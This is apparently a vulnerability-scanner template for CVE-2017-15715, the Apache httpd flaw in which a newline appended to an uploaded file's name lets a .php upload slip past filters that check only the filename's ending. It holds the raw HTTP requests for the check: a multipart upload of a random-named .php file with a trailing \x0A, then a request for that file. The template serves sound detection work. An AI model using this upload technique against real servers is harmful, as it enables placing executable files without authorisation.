id: CVE-2017-15715 info: name: Apache Arbitrary File Upload author: geeknik description: In Apache httpd 2.4.0 to 2.4.29, the expression specified in could match '$' to a newline character in a malicious filename, rather than matching only the end of the filename. This could be exploited in environments where uploads of some files are are externally blocked, but only by matching the trailing portion of the filename. reference: https://github.com/vulhub/vulhub/tree/master/httpd/CVE-2017-15715 severity: high tags: cve,cve2017,apache,httpd,fileupload requests: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Length: 264 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryKc8fBVDo558U4hbJ Accept-Encoding: gzip, deflate Connection: close ------WebKitFormBoundaryKc8fBVDo558U4hbJ Content-Disposition: form-data; name="file"; filename="{{randstr}}.php" {{randstr_1}} ------WebKitFormBoundaryKc8fBVDo558U4hbJ Content-Disposition: form-data; name="name" {{randstr}}.php\x0A ------WebKitFormBoundaryKc8fBVDo558U4hbJ-- - | GET /{{randstr}}.php\x0A HTTP/1.1 Host: {{Hostname}} Accept-Encoding: gzip,deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0) Connection: close req-condition: true matchers: - type: dsl dsl: - 'contains(body_2, "{{randstr_1}}")'